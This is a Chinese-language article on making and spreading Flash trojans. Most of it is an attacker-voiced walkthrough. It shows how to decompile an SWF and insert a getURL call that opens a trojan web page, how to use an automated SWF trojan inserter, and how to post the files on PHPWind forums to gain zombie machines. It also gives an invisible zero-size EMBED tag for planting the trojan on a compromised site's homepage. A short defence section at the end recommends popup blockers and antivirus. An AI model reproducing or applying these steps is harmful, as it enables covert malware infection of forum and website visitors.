知已知彼 黑客如何制作Flash木馬程序

　　在網站上觀看Flash動畫，接收到“好友”發來的一張Flash賀卡，甚至於一個QQ魔法表情，一不留神就中了一個木馬!Flash動畫木馬可以說是無處不在，攻擊威力和覆蓋面極其廣。許多朋友一定想了解Flash木馬的原理，想知道攻擊者是如何在SWF中插入木馬的呢?我們應該怎麼樣來防范Flash木馬呢?

　　一、制作Flash動畫木馬的准備

　　Flash動畫木馬的原理，是在網頁中顯示或本地直接播放Flash動畫木馬時，讓Flash自動打開一個網址，而該網址就是我們預先制作好的一個木馬網頁。也就是說，在制作網頁木馬前，我們首先需要制作好一個網頁木馬，並將它放置到某個網站上去。

　　另外，我們還需要准備一個比較吸引人的Flash動畫文件“MM熱舞.swf”，以及Flash動畫反編譯工具“閃客精靈”，編輯工具Macromedia Flash MX。

　　二、最原始的Flash木馬

　　現在雖然有了許多各種各樣的Flash動畫木馬制作工具，但是為了了解Flash動畫木馬的最基本原理，有必要從頭開始用最原始的方法制作一個Flash木馬。

　　步驟一：反編譯SWF動畫

　　首先我們需要將要插入網頁木馬的Flash動畫文件“MM熱舞.swf”，反編譯成可編輯的.fla格式。運行“閃客精靈”，點擊菜單“文件”→“快速打開”命令，指定“MM熱舞.swf”文件將其導入。然後點擊工具欄上的“導出FLA”命令，將動畫導出為“MM熱舞.fla”文件。

　　步驟二：插入網頁木馬代碼

　　然後運行Flash動畫編輯器Macromedia Flash MX，點擊菜單“文件”→“打開”，調入剛才保存的fla文件。展開界面下方的“動作/幀”欄，再展開“動作”→“浏覽器/網絡”項，點擊其中的“getURL”命令，在右邊窗口中的“URL”裡面輸入我們的網頁木馬地址;窗口方式為“_blank”;“變量”設置為“使用GET方式發送”，在下方的代碼窗口中將出現“getURL("http://網頁木馬地址", "_blank", "GET");”。

　　步驟三：生成Flash木馬

　　設置完畢後保存文件，並點擊菜單“文件”→“發布”命令，將動畫重新導出為SWF格式。用IE浏覽器打開剛才生成的Flash動畫木馬，可以看到隨著Flash動畫打開播放時，自動彈出一個浏覽器窗口，裡面將會顯示我們的木馬網頁。

　　三、簡簡單單生成Flash木馬

　　上面插入木馬的過程比較麻煩，下面我們介紹一個簡單的方法，也正是這些簡單的工具使得Flash木馬在網上隨處可見。

　　運行SWF木馬插入器，點擊界面中的“選擇”按鈕，浏覽指定要插入木馬的SWF文件;在“插入代碼”中輸入木馬網頁的地址;切記不要勾選下面的“只解壓”項。設置完畢後，點擊“給我插”按鈕，程序提示開始插入木馬網頁。顯示成功信息後，關閉程序，用IE打開生成的動畫，可以看到自動跳轉到木馬網頁去了。

　　四、Flash木馬的利用

　　看到上面的步驟了吧，生成一個Flash動畫木馬是不是很簡單? 那麼生成的Flash木馬該如何應用呢?只要我們將Flash上傳到某個網站中，就可以通過論壇或網站之類的直接利用了。

　　大部分的論壇中都可以發來Flash動畫的帖子，利用論壇發帖，攻擊者可以快速獲得大量的肉雞。以PHPWind v4.3.2 論壇為例，在發帖或回復時，點擊編輯窗口上方的“插入Flash動畫”按鈕，設置Flash窗口大小，使用默認設置後，要求輸入Flash的URL地址。確定後，可以看到編輯窗口中顯示的代碼為““(flash=400,300)hxxp://www.flash**.com.cn/upfiles/20067**.swf(/flash)””，這就是完整的Flash播放代碼了，不同的論壇代碼是不一樣的。

　　應用二：網頁嵌入Flash木馬

　　攻擊者入侵了某個大的網站之後，很可能在網站首頁掛馬，使用普通方式掛馬會被管理員發覺，但是掛上Flash木馬的話，是很難查殺的。攻擊者可能在網頁中插入如下代碼：

　　“《EMBED src=http://網頁木馬地址/木馬.swf width=0 height=0 type=application/x-shockwave-flash AUTOSTART="false" ShowStatusBar="false"》”，其中的《》改為<>。

　　這裡的參數“width=0 height=0”表示，Flash播放窗口為零，也就是不顯示Flash播放窗口。其它用戶浏覽網頁時，就會莫名其妙的彈出一個木馬網頁窗口。

　　五、關於Flash木馬的防范

　　其實不管Flash木馬有多麼的巧妙，最終都是要跳轉到木馬網頁去的，也就是說我們最終要防范的還是網頁木馬。了解了思路，對於Flash動畫木馬就簡單了：

　　首先，要開啟Windows XP SP2的窗口攔截窗口功能，或安裝其它防彈出窗口的插件。如果那個漏網之魚，莫名其妙彈出的網頁窗口要及時的關閉。另外，一定要在上網浏覽時開啟殺毒軟件的網頁監控功能，只要網頁木馬在後台一下載到本地硬盤，就會被殺毒軟件查殺，這樣就萬事無憂了!

　　PS:本文中對代碼做了一些處理。